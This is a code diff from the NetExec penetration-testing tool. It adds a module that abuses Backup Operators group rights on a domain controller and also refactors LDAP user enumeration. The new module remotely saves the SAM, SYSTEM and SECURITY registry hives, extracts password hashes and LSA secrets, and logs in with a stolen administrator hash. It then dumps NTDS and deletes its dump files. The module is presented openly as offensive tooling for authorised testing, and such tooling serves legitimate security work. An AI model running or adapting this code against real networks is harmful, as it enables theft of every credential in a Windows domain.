Merge branch 'main' into neff-patch-1

nxc/modules/backup_operator.py

@@ -0,0 +1,143 @@
+import time
+import os
+import datetime
+
+from impacket.examples.secretsdump import SAMHashes, LSASecrets, LocalOperations
+from impacket.smbconnection import SessionError
+from impacket.dcerpc.v5 import transport, rrp
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
+
+from nxc.paths import NXC_PATH
+
+class NXCModule:
+    name = "backup_operator"
+    description = "Exploit user in backup operator group to dump NTDS @mpgn_x64"
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def __init__(self, context=None, module_options=None):
+        self.context = context
+        self.module_options = module_options
+        self.domain_admin = None
+        self.domain_admin_hash = None
+        self.deleted_files = True  # flag to check if SAM/SYSTEM/SECURITY files were deleted
+
+    def options(self, context, module_options):
+        """NO OPTIONS"""
+
+    def on_login(self, context, connection):
+        connection.args.share = "SYSVOL"
+        # enable remote registry
+        context.log.display("Triggering RemoteRegistry to start through named pipe...")
+        self.trigger_winreg(connection.conn, context)
+        rpc = transport.DCERPCTransportFactory(r"ncacn_np:445[\pipe\winreg]")
+        rpc.set_smb_connection(connection.conn)
+        if connection.kerberos:
+            rpc.set_kerberos(connection.kerberos, kdcHost=connection.kdcHost)
+        dce = rpc.get_dce_rpc()
+        if connection.kerberos:
+            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+        dce.connect()
+        dce.bind(rrp.MSRPC_UUID_RRP)
+
+        try:
+            for hive in ["HKLM\\SAM", "HKLM\\SYSTEM", "HKLM\\SECURITY"]:
+                hRootKey, subKey = self._strip_root_key(dce, hive)
+                outputFileName = f"\\\\{connection.host}\\SYSVOL\\{subKey}"
+                context.log.debug(f"Dumping {hive}, be patient it can take a while for large hives (e.g. HKLM\\SYSTEM)")
+                try:
+                    ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, dwOptions=rrp.REG_OPTION_BACKUP_RESTORE | rrp.REG_OPTION_OPEN_LINK, samDesired=rrp.KEY_READ)
+                    rrp.hBaseRegSaveKey(dce, ans2["phkResult"], outputFileName)
+                    context.log.highlight(f"Saved {hive} to {outputFileName}")
+                except Exception as e:
+                    context.log.fail(f"Couldn't save {hive}: {e} on path {outputFileName}")
+                    return
+        except (Exception, KeyboardInterrupt) as e:
+            context.log.fail(str(e))
+        finally:
+            dce.disconnect()
+
+        # copy remote file to local
+        log_path = os.path.expanduser(f"{NXC_PATH}/logs/{connection.hostname}_{connection.host}_{datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}.".replace(":", "-"))
+        for hive in ["SAM", "SECURITY", "SYSTEM"]:
+            connection.get_file_single(hive, log_path + hive)
+
+        # read local file
+        try:
+            def parse_sam(secret):
+                context.log.highlight(secret)
+                if not self.domain_admin:
+                    first_line = secret.strip().splitlines()[0]
+                    fields = first_line.split(":")
+                    self.domain_admin = fields[0]
+                    self.domain_admin_hash = fields[3]
+
+            local_operations = LocalOperations(log_path + "SYSTEM")
+            boot_key = local_operations.getBootKey()
+            sam_hashes = SAMHashes(log_path + "SAM", boot_key, isRemote=False, perSecretCallback=lambda secret: parse_sam(secret))
+            sam_hashes.dump()
+            sam_hashes.finish()
+
+            LSA = LSASecrets(log_path + "SECURITY", boot_key, None, isRemote=False, perSecretCallback=lambda secret_type, secret: context.log.highlight(secret))
+            LSA.dumpCachedHashes()
+            LSA.dumpSecrets()
+        except Exception as e:
+            context.log.fail(f"Fail to dump the sam and lsa: {e!s}")
+
+        if self.domain_admin:
+            connection.conn.logoff()
+            connection.create_conn_obj()
+            if connection.hash_login(connection.domain, self.domain_admin, self.domain_admin_hash):
+                try:
+                    context.log.display("Dumping NTDS...")
+                    connection.ntds()
+                except Exception as e:
+                    context.log.fail(f"Fail to dump the NTDS: {e!s}")
+
+                context.log.display(f"Cleaning dump with user {self.domain_admin} and hash {self.domain_admin_hash} on domain {connection.domain}")
+                connection.execute("del C:\\Windows\\sysvol\\sysvol\\SECURITY && del C:\\Windows\\sysvol\\sysvol\\SAM && del C:\\Windows\\sysvol\\sysvol\\SYSTEM")
+                for hive in ["SAM", "SECURITY", "SYSTEM"]:
+                    try:
+                        out = connection.conn.listPath("SYSVOL", hive)
+                        if out:
+                            self.deleted_files = False
+                            context.log.fail(f"Fail to remove the file {hive}, path: C:\\Windows\\sysvol\\sysvol\\{hive}")
+                    except SessionError as e:
+                        context.log.debug(f"File {hive} successfully removed: {e}")
+            else:
+                self.deleted_files = False
+        else:
+            self.deleted_files = False
+
+        if not self.deleted_files:
+            context.log.display("Use the domain admin account to clean the file on the remote host")
+            context.log.display("netexec smb dc_ip -u user -p pass -x \"del C:\\Windows\\sysvol\\sysvol\\SECURITY && del C:\\Windows\\sysvol\\sysvol\\SAM && del C:\\Windows\\sysvol\\sysvol\\SYSTEM\"")  # noqa: Q003
+        else:
+            context.log.display("Successfully deleted dump files !")
+
+    def trigger_winreg(self, connection, context):
+        # Original idea from https://twitter.com/splinter_code/status/1715876413474025704
+        # Basically triggers the RemoteRegistry to start without admin privs
+        tid = connection.connectTree("IPC$")
+        try:
+            connection.openFile(
+                tid,
+                r"\winreg",
+                0x12019F,
+                creationOption=0x40,
+                fileAttributes=0x80,
+            )
+        except SessionError as e:
+            # STATUS_PIPE_NOT_AVAILABLE error is expected
+            context.log.debug(str(e))
+        # Give remote registry time to start
+        time.sleep(1)
+
+    def _strip_root_key(self, dce, key_name):
+        # Let's strip the root key
+        key_name.split("\\")[0]
+        sub_key = "\\".join(key_name.split("\\")[1:])
+        ans = rrp.hOpenLocalMachine(dce)
+        h_root_key = ans["phKey"]
+        return h_root_key, sub_key

nxc/protocols/ldap.py

@@ -4,7 +4,7 @@
 import hmac
 import os
 from binascii import hexlify
-from datetime import datetime, timedelta
+from datetime import datetime
 from re import sub, I
 from zipfile import ZipFile
 from termcolor import colored
@@ -651,38 +651,25 @@ def users(self):
             search_filter = f"(|{''.join(f'(sAMAccountName={user})' for user in self.args.users)})"
         else:
             self.logger.debug("Trying to dump all users")
-            search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
+            search_filter = "(sAMAccountType=805306368)"
 
-        # default to these attributes to mirror the SMB --users functionality
+        # Default to these attributes to mirror the SMB --users functionality
         request_attributes = ["sAMAccountName", "description", "badPwdCount", "pwdLastSet"]
         resp = self.search(search_filter, request_attributes, sizeLimit=0)
 
         if resp:
-            # I think this was here for anonymous ldap bindings, so I kept it, but we might just want to remove it
-            if self.username == "":
-                self.logger.display(f"Total records returned: {len(resp):d}")
-                for item in resp:
-                    if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
-                        continue
-                    self.logger.highlight(f"{item['objectName']}")
-                return
+            resp_parse = parse_result_attributes(resp)
 
-            users = parse_result_attributes(resp)
-            # we print the total records after we parse the results since often SearchResultReferences are returned
-            self.logger.display(f"Enumerated {len(users):d} domain users: {self.domain}")
-            self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
-            for user in users:
-                # TODO: functionize this - we do this calculation in a bunch of places, different, including in the `pso` module
-                parsed_pw_last_set = ""
+            # We print the total records after we parse the results since often SearchResultReferences are returned
+            self.logger.display(f"Enumerated {len(resp_parse):d} domain users: {self.domain}")
+            self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<9}{'-Description-':<60}")
+            for user in resp_parse:
                 pwd_last_set = user.get("pwdLastSet", "")
-                if pwd_last_set != "":
-                    timestamp_seconds = int(pwd_last_set) / 10**7
-                    start_date = datetime(1601, 1, 1)
-                    parsed_pw_last_set = (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")
-                    if parsed_pw_last_set == "1601-01-01 00:00:00":
-                        parsed_pw_last_set = "<never>"
-                # we default attributes to blank strings if they don't exist in the dict
-                self.logger.highlight(f"{user.get('sAMAccountName', ''):<30}{parsed_pw_last_set:<20}{user.get('badPwdCount', ''):<8}{user.get('description', ''):<60}")
+                if pwd_last_set:
+                    pwd_last_set = "<never>" if pwd_last_set == "0" else datetime.fromtimestamp(self.getUnixTime(int(pwd_last_set))).strftime("%Y-%m-%d %H:%M:%S")
+
+                # We default attributes to blank strings if they don't exist in the dict
+                self.logger.highlight(f"{user.get('sAMAccountName', ''):<30}{pwd_last_set:<20}{user.get('badPwdCount', ''):<9}{user.get('description', ''):<60}")
 
     def groups(self):
         # Building the search filter
@@ -730,7 +717,7 @@ def dc_list(self):
                     for record_type in ["A", "AAAA", "CNAME", "PTR", "NS"]:
                         if found_record:
                             break  # If a record has been found, stop checking further
-                        
+
                         try:
                             answers = resolv.resolve(name, record_type, tcp=self.args.dns_tcp)
                             for rdata in answers:
@@ -763,73 +750,29 @@ def dc_list(self):
 
     def active_users(self):
         if len(self.args.active_users) > 0:
-            arg = True
             self.logger.debug(f"Dumping users: {', '.join(self.args.active_users)}")
-            search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
-            search_filter_args = f"(|{''.join(f'(sAMAccountName={user})' for user in self.args.active_users)})"
+            search_filter = f"(|{''.join(f'(sAMAccountName={user})' for user in self.args.active_users)})"
         else:
-            arg = False
             self.logger.debug("Trying to dump all users")
-            search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
+            search_filter = "(sAMAccountType=805306368)"
 
-        # default to these attributes to mirror the SMB --users functionality
+        # Default to these attributes to mirror the SMB --users functionality
         request_attributes = ["sAMAccountName", "description", "badPwdCount", "pwdLastSet", "userAccountControl"]
         resp = self.search(search_filter, request_attributes, sizeLimit=0)
-        allusers = parse_result_attributes(resp)
 
-        count = 0
-        activeusers = []
-        argsusers = []
+        if resp:
+            all_users = parse_result_attributes(resp)
+            # Filter disabled users (ignore accounts without userAccountControl value)
+            active_users = [user for user in all_users if not (int(user.get("userAccountControl", UF_ACCOUNTDISABLE)) & UF_ACCOUNTDISABLE)]
 
-        if arg:
-            resp_args = self.search(search_filter_args, request_attributes, sizeLimit=0)
-            users_args = parse_result_attributes(resp_args)
-            # This try except for, if user gives a doesn't exist username. If it does, parsing process is crashing
-            for i in range(len(self.args.active_users)):
-                try:
-                    argsusers.append(users_args[i])
-                except Exception as e:
-                    self.logger.debug("Exception:", exc_info=True)
-                    self.logger.debug(f"Skipping item, cannot process due to error {e}")
-        else:
-            argsusers = allusers
-
-        for user in allusers:
-            user_account_control = user.get("userAccountControl")
-            if user_account_control is not None:  # Check if user_account_control is not None
-                account_control = "".join(user_account_control) if isinstance(user_account_control, list) else user_account_control  # If it's already a list
-                account_disabled = int(account_control) & 2
-                if not account_disabled:
-                    count += 1
-                    activeusers.append(user.get("sAMAccountName").lower())
-            else:
-                self.logger.debug(f"userAccountControl for user {user.get('sAMAccountName')} is None")
+            self.logger.display(f"Total records returned: {len(all_users)}, total {len(all_users) - len(active_users):d} user(s) disabled")
+            self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<9}{'-Description-':<60}")
 
-        if self.username == "":
-            self.logger.display(f"Total records returned: {len(resp):d}")
-            for item in resp_args:
-                if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
-                    continue
-                self.logger.highlight(f"{item['objectName']}")
-            return
-        self.logger.display(f"Total records returned: {count}, total {len(allusers) - count:d} user(s) disabled") if not arg else self.logger.display(f"Total records returned: {len(argsusers)}, Total {len(allusers) - count:d} user(s) disabled")
-        self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
-
-        for arguser in argsusers:
-            pwd_last_set = arguser.get("pwdLastSet", "")  # Retrieves pwdLastSet directly and defaults to an empty string.
-            if pwd_last_set:  # Checks if pwdLastSet is empty or not.
-                timestamp_seconds = int(pwd_last_set) / 10**7  # Converts pwdLastSet to an integer.
-                start_date = datetime(1601, 1, 1)
-                parsed_pw_last_set = (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")
-                if parsed_pw_last_set == "1601-01-01 00:00:00":
-                    parsed_pw_last_set = "<never>"
-
-            if arguser.get("sAMAccountName").lower() in activeusers and arg is False:
-                self.logger.highlight(f"{arguser.get('sAMAccountName', ''):<30}{parsed_pw_last_set:<20}{arguser.get('badPwdCount', ''):<8}{arguser.get('description', ''):<60}")
-            elif (arguser.get("sAMAccountName").lower() not in activeusers) and arg is True:
-                self.logger.highlight(f"{arguser.get('sAMAccountName', '') + ' (Disabled)':<30}{parsed_pw_last_set:<20}{arguser.get('badPwdCount', ''):<8}{arguser.get('description', ''):<60}")
-            elif (arguser.get("sAMAccountName").lower() in activeusers):
-                self.logger.highlight(f"{arguser.get('sAMAccountName', ''):<30}{parsed_pw_last_set:<20}{arguser.get('badPwdCount', ''):<8}{arguser.get('description', ''):<60}")
+            for user in active_users:
+                pwd_last_set = user.get("pwdLastSet", "")
+                if pwd_last_set:
+                    pwd_last_set = "<never>" if pwd_last_set == "0" else datetime.fromtimestamp(self.getUnixTime(int(pwd_last_set))).strftime("%Y-%m-%d %H:%M:%S")
+                self.logger.highlight(f"{user.get('sAMAccountName', ''):<30}{pwd_last_set:<20}{user.get('badPwdCount', ''):<9}{user.get('description', '')}")
 
     def asreproast(self):
         if self.password == "" and self.nthash == "" and self.kerberos is False:

tests/e2e_commands.txt

@@ -89,6 +89,7 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M install_
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ioxidresolver
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M security-questions
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M remove-mic
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M backup_operator
 # currently hanging indefinitely - TODO: look into this
 #netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M keepass_discover
 #netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M keepass_trigger -o ACTION=ALL USER=LOGIN_USERNAME KEEPASS_CONFIG_PATH="C:\\Users\\LOGIN_USERNAME\\AppData\\Roaming\\KeePass\\KeePass.config.xml"